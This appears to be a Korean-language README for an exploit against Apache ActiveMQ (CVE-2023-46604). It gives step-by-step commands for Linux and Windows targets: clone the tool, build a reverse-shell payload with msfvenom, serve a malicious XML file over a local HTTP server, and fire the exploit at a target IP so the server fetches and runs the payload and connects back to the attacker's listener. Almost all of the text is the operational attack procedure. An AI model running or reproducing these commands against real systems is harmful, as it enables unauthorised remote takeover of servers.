
Apache ActiveMQ(CVE_2023-46604) 리버스 셸 익스플로잇 달성
이 익스플로잇은 https://github.com/X1cT34m (https://github.com/X1r0z/ActiveMQ-RCE)에서 제공하는 기본 작업을 기반으로 합니다. 우리는 Metasploit Framework (https://github.com/rapid7/metasploit-framework)를 활용하여 리버스 셸을 달성하기 위해 기술을 더욱 발전시켰습니다.
중요: XML 파일의 IP 주소(11행의 0.0.0.0)를 페이로드가 생성될 IP 주소로 수동으로 변경하십시오. 아래 명령을 따르면 리스너 IP 주소가 됩니다. 또한 {IP_Of_Hosted_XML_File}도 리스너 IP 주소가 됩니다.
Linux/Unix 대상
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p linux/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f elf -o test.elf
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-linux.xml
Windows 대상
git clone https://github.com/SaumyajeetDas/CVE-2023-46604-RCE-Reverse-Shell
cd CVE-2023-46604-RCE-Reverse-Shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST={Your_Listener_IP/Host} LPORT={Your_Listener_Port} -f eXE -o test.exe
python3 -m http.server 8001
./ActiveMQ-RCE -i {Target_IP} -u http://{IP_Of_Hosted_XML_File}:8001/poc-windows.xml



적극적으로 지원해주신 https://github.com/Anon4mous 님께 특별한 감사를 드립니다.